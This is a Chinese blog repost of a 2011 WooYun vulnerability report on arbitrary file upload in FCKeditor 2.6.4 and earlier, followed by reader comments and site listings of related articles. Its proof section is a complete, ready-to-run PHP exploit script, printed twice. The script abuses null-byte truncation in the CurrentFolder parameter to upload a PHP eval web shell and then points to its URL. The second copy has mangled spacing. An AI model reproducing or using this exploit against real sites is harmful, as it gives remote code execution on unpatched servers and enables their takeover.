fckeditor 2.6 php,fckeditor <= 2.6.4 任意文件上传漏洞

最新推荐文章于 2024-05-14 03:24:06 发布
最新推荐文章于 2024-05-14 03:24:06 发布
阅读量702 收藏
点赞数
文章标签: fckeditor 2.6 php

漏洞概要

缺陷编号:WooYun-2011-01684

漏洞标题:fckeditor <= 2.6.4 任意文件上传漏洞

相关厂商:fckeditor

漏洞作者:我勒个去

提交时间:2011-03-22 14:09

公开时间:2011-03-22 14:18

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

Tags标签:

漏洞详情

披露状态:

2011-03-22: 积极联系厂商并且等待厂商认领中,细节不对外公开

2011-03-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测

详细说明:

currentfolder过滤不给力啊,但是GPC就能让它脑残

漏洞证明:

set_time_limit(0);

ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));

$match = array();function http_send($host, $packet)

{

$sock = fsockopen($host, 80);

while (!$sock)

{

print "\n[-] No response from {$host}:80 Trying again...";

$sock = fsockopen($host, 80);

}

fputs($sock, $packet);

while (!feof($sock)) $resp .= fread($sock, 1024);

fclose($sock);

print $resp;

return $resp;

}function connector_response($html)

{

global $match;

return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));

}print "\n+------------------------------------------------------------------+";

print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";

print "\n+------------------------------------------------------------------+\n";if ($argc < 3)

{

print "\nUsage......: php $argv[0] host path\n";

print "\nExample....: php $argv[0] localhost /\n";

print "\nExample....: php $argv[0] localhost /FCKEditor/\n";die();

}$host = $argv[1];

$path = ereg_replace("(/){2,}", "/", $argv[2]);$filename = "fvck.gif";

$foldername = "fuck.php%00.gif";

$connector = "editor/filemanager/connectors/php/connector.php";$payload = "-----------------------------265001916915724\r\n";

$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";

$payload .= "Content-Type: image/jpeg\r\n\r\n";

$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";

$payload .= "-----------------------------265001916915724--\r\n";$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";

//print $packet;

$packet.= "Host: {$host}\r\n";$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;print $packet;if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");

else print "\n[-] Job done! try http://${host}/$match[2] \n";?>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

set_time_limit(0);

ini_set("default_socket_timeout",5);define(STDIN,fopen("php://stdin","r"));

$match=array();functionhttp_send($host,$packet)

{

$sock=fsockopen($host,80);

while(!$sock)

{

print"\n[-] No response from {$host}:80 Trying again...";

$sock=fsockopen($host,80);

}

fputs($sock,$packet);

while(!feof($sock))$resp.=fread($sock,1024);

fclose($sock);

print$resp;

return$resp;

}functionconnector_response($html)

{

global$match;

return(preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/",$html,$match)&&in_array($match[1],array(0,201)));

}print"\n+------------------------------------------------------------------+";

print"\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";

print"\n+------------------------------------------------------------------+\n";if($argc<3)

{

print"\nUsage......: php $argv[0] host path\n";

print"\nExample....: php $argv[0] localhost /\n";

print"\nExample....: php $argv[0] localhost /FCKEditor/\n";die();

}$host=$argv[1];

$path=ereg_replace("(/){2,}","/",$argv[2]);$filename="fvck.gif";

$foldername="fuck.php%00.gif";

$connector="editor/filemanager/connectors/php/connector.php";$payload="-----------------------------265001916915724\r\n";

$payload.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";

$payload.="Content-Type:  image/jpeg\r\n\r\n";

$payload.='GIF89a'."\r\n".'<?phpeval ($_POST[a])?>'."\n";

$payload.="-----------------------------265001916915724--\r\n";$packet="POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";

//print $packet;

$packet.="Host: {$host}\r\n";$packet.="Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";

$packet.="Content-Length: ".strlen($payload)."\r\n";

$packet.="Connection: close\r\n\r\n";

$packet.=$payload;print$packet;if(!connector_response(http_send($host,$packet)))die("\n[-] Upload failed!\n");

elseprint"\n[-] Job done! try http://${host}/$match[2] \n";?>

修复方案:

参见**.**.**.**修复

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:12 (WooYun评价)

评价

2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

2010-01-01 00:00 Jacks 白帽子 | Rank:142 漏洞数:25)

这个code怎么那么熟悉?不是EgiX 写的那个?

2010-01-01 00:00 m0r5 白帽子 | Rank:30 漏洞数:6)

这不是是EgiX 写的那个?

2010-01-01 00:00 霍家二爷 白帽子 | Rank:63 漏洞数:7)

http://seclists.org/pen-test/2010/Jul/0

截断呀截断

2010-01-01 00:00 G8dSnow 白帽子 | Rank:21 漏洞数:5)

截断各处中招,xss和文件操作都有。。。伤不起。。。

所有媒体,可在保留署名、原文连接的情况下转载,若非则不得使用我方内容。

0963213a632e2d4efbdecbc51d69606f.png

关注网络安全,分享和记录有趣的资源内容。体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果请用户自负。

2006-2019 体验盒子

×

扫码分享

验证:体验盒子

扫码分享

×

weixin_39655362
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fckeditor <= 2.6.4 任意文件上传漏洞
blogfeifei
09-27 205
&lt;? error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 8...
FCKeditor 2.6.4 php版本任意文件上传——漏洞复现
W小哥
06-17 7403
一、漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多Web项目和大型网站均采用了FCKeditor。 Fckeditor 低于 2.6.4 php 版本任意文件上传漏洞,当您的PHP环境配置为 GPC = Off 时可绕过currentfolder参数过滤上传脚本木马控制网站服务器 二、漏洞原理 漏洞版本:<=2.6.4 三、环境搭建
2024年【渗透测试】--- FCKeditor文本编辑器漏洞_ckeditor漏洞,保洁阿姨看完都会了
最新发布
2401_85013604的博客
05-14 634
迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
记Fckeditor漏洞
zhangpeng999123的博客
03-07 2180
首先是对目标站点进行了基本的测试然后发现了存在fckeditor,fckeditor漏洞有很多,基本asp的都被通杀了,大家可以在网上看看。首先看看编辑器的版本: $ http://xxxxxxx.com/fckeditor/editor/dialog/fck_about.html 查看版本信息: 版本信息 可以看到是2.6.6的版本,那就对症下药。同时提一下,查看版...
FCKeditor 2.6.6 可直接使用
07-19
比起ckeditor编辑器,还是觉得这个好用,可直接复制到自己的项目上去使用,使用文档里有使用指南!
fckeditor php漏洞,Fckeditor漏洞总结及利用方法(未成功)
weixin_34837898的博客
03-22 1472
先在这里做一个Fckeditor知识的了解:FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。现在利用其本身的开放源代码,进行一些漏洞性的入侵。当然网上也有相关知识,详细资料自己找第一:查看编辑器版本其相关默认路径如:FCKeditor/_whatsnew.htmlFCKeditor/editor/dialog/fck_about.htmlFCKeditor/_samp...
Fckeditor <= 2.4.2 的任意文件上传漏洞代码解析
风炫 致力于顶级网络安全专家
02-20 2147
无聊,看了下fckeditor漏洞,发现有网友已经提出Fckeditor 首先打开fckeditor\editor\filemanager\upload\php\config.php  配置fck。 我配置的信息如下  你们可以自己修改 <?php /* * FCKeditor - The text editor for Internet - http://www.fckeditor.
fckeditor 2 6 4 任意文件上传漏洞
ytfhjhv的博客
11-12 6396
fckeditor 2 6 4 任意文件上传漏洞
FCKeditor_2.6.6+FCKeditor.Net_2.6.4
04-02
5. **文件管理**:FCKeditor内置了简单的文件管理器,允许用户上传和管理图片、文档等资源。开发者可以通过配置文件或编写自定义的文件上传处理器来扩展这一功能,比如实现基于数据库的文件存储或权限控制。 6. **...
fckeditor2.6.4 java配置好的项目下载
01-18
**FCKeditor 2.6.4 for Java:配置与使用详解** FCKeditor是一款流行的开源文本编辑器,尤其在Web开发中广泛使用,它提供了丰富的富文本编辑功能,允许用户在网页上编辑内容如同在桌面应用中一样。在Java环境中,...
FCKeditor.Net_2.6.3.zip和FCKeditor-v2.6.3
10-22
3. **丰富的编辑功能**:FCKeditor提供了许多高级编辑功能,如字体样式调整、段落格式设置、颜色选择、链接管理、图片上传、表格编辑、嵌入多媒体内容等。 4. **自定义扩展**:开发者可以通过API和插件系统对...
fckeditor(jsp版)
06-18
采用2.6.4版本,彻底解决fckeditor(jsp版)上传中文文件乱码问题。 使用Tomcat应用服务器时,为了更好的支持URL地址中的中文参数问题.需要在tomcat进行如下设置: 需要修改server.xml文件的如下行: <Connector port="8080" maxHttpHeaderSize="8192" maxThreads="150" minSpareThreads="25" maxSpareThreads="75" enableLookups="false" redirectPort="8443" acceptCount="100" connectionTimeout="20000" disableUploadTimeout="true" URIEncoding="UTF-8"/> <Connector port="8080" maxHttpHeaderSize="8192" maxThreads="150" minSpareThreads="25" maxSpareThreads="75" enableLookups="false" redirectPort="8443" acceptCount="100" connectionTimeout="20000" disableUploadTimeout="true" URIEncoding="UTF-8"/> 注意URIEncoding="UTF-8"的部分,即将URI的编码设置为“UTF-8“,这样就不会有问题了;
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
03-18
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
fckeditor 2.6.4可调试版
04-22
**fckeditor 2.6.4可调试版** FCKeditor是一款开源的Web富文本编辑器,它在2003年由Fernando Gomilla创建,被广泛应用于网站、内容管理系统(CMS)和其他需要在线文本编辑功能的应用中。这款编辑器支持多种浏览器,...
FCKeditor_2.6.4.1
08-07
《FCKeditor_2.6.4.1:一款经典的Web文档编辑器》 FCKeditor是一款历史悠久且功能强大的开源Web文档编辑器,版本号2.6.4.1是其在某个时间点的重要更新。它以其易用性和灵活性赢得了全球开发者的广泛赞誉,尤其在...
fckeditor文件上传getshell
千寻的博客
05-17 3313
第二次上传之后是111(1).asp(此时发现已经存在,进行重命名,进行截断)4、更改后缀.asp txt文件,使用hex更改20–00。window server 2019 的IIS搭建的网站。第一次上传之后是111.asp_txt(此时.变成了_)2、发现可以上传一个txt后缀的文件。3、但是无法上传asp的文件。发现存在FCKeditor。1、访问编辑器,进行上传。
FCK各版本漏洞
bulebirds的专栏
04-25 3097
FCKeditor v2.43版本FCKeditor/editor/filemanager/browser/default/connectors/php/config.php FCKeditor V2.6.6版本 fckeditor/editor/filemanager/connectors/asp/config.php   查看编辑器版本 FCKeditor/_whats
【渗透测试】--- FCKeditor文本编辑器漏洞
热门推荐
qq_43168364的博客
12-25 1万+
一、FCKeditor编辑器漏洞 FCKeditor编辑器是一款强大的所见即所得文本编辑器,现在已经更名为:CKEditor fckeditor的常见敏感目录(FCK有时要小写) (1) 查看版本信息 /FCKeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html (2) 默认上传页面 /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/edito
对fckeditor的一次渗透测试
看不尽的尘埃——博客
11-19 1022
以前微信公众号的文章,由于要改版了,在CSND上备份下。 前言 今天目标是研究一下fckeditor编辑器的漏洞,寻找一些在防御上的思路。自己本地用Windows 2003 server 搭建fckeditor 编辑器,版本是2.6.3的,但是通过网上的一些资料发现列目录的漏洞在我搭建的环境中没效果,于是我尝试在网上搜索一些教育行业有fckeditor编辑器组件的网站。不幸的是,寻找到的URL...
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
"FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1" FCKeditor(现称为CKeditor)是CKSource公司的一款开源的所见即所得(WYSIWYG)文本编辑器,可以集成到网络应用中,为用户提供类似文字...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值